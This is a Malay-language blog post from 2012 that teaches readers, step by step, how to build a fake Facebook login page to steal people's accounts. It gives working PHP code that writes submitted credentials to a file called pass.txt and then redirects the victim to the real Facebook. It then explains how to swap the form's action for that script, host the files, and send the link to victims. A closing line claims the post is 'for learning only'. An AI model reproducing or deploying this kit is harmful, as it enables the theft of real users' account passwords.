Tuesday, 17 January 2012

Rahsia menggodam facebook dirungkai

Assalammualaikum dan salam sejahtera,,

Ok.,untuk tutor kali ini aku nak berkongsi dengan korang cara-cara buat fake facebook(phishing) bukan kencing tau..Sebelum itu korang kena thu apa itu phishing..Aku terangkan sikit la yang selebihnya korang google la sendiri...Aku bukan tahu sangat pon..hehe.. Nak senang citer phishing itu macam memancing la..Nak memancing korang kena bawak apa??umpan kan?? ha! sekarang nie aku nak ajar korang cara nak buat umpan..ia akan nmpak seolah-olah page facebook yang sebenar..hehehe..tengok betol-betol tau..

1.korang bukak www.facebook.com
2.korang tekan ctrl+u. akan keluar source code untuk page itu..
3.lepas itu korang tekan ctrl+a untuk select all.
4.then korang tekan pulak ctrl+c untuk copy.
5.bukak notepad dan paste kan source code tadi ke dalam notepad.
6.korang minimize notepad tu dulu..sekarang korang bukak notepad yang baru.
7.aku nak korang copy code kat bawah ni dan paste ke notepad yang baru korang bukak tadi.

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

8.aku nak korang save as code tu dalam extension .php..contoh: post.php. pastikan save as type dalam keadaan All Files.
9.bukak notepad yang satu lagi..ala yang korang paste source code dari facebook tu..buat-buat lupa pulak..hehehe..gurau je la..
10.ok..kalau dah bukak korang tekan ctrl+f untuk senang kita cari perkataan dalam tu..
11.sekarang korang taip 'action'..macam gambar kat bawah ni..


                                                click gambar untuk zoom


12.aku nak korang padam code selepas action tu dan tukar dengan nama file post.php korang..
korang tengok perbezaan gambar kat bawah ni..




13.kalau dah tukar kira jadi la 2..jagan seronok lagi..
14.lepas dah tukar ke file korang aku nak korang save notepad tadi dalam extension html. contoh: ikan.html
15.ok..sekarang korang dah ade 2 files iaitu post.php dan ikan.html..haha
16.ha! apa tunggu lagi upload la masuk file hosting korang..Korang boleh cuba guna domain dan hosting di entry Dapatkan Free Hosting Dan Domain.
17.ia akan jadi macam nie. www.domainkorang.com/ikan.html..bersedia untuk dihantar ke mangsa anda..selepas mangsa anda telah masuk ke perangkap,dalam hosting korang akan muncul file pass.txt..korang boleh tengok email dan password mangsa kat dalam tu..ok..selamat mencuba..paham tak??tak paham baca 10 kali..


p/s: ini untuk pembelajaran sahaja..kalau jadi apa-apa korang tanggung sendiri..ok..wasslam

Reactions: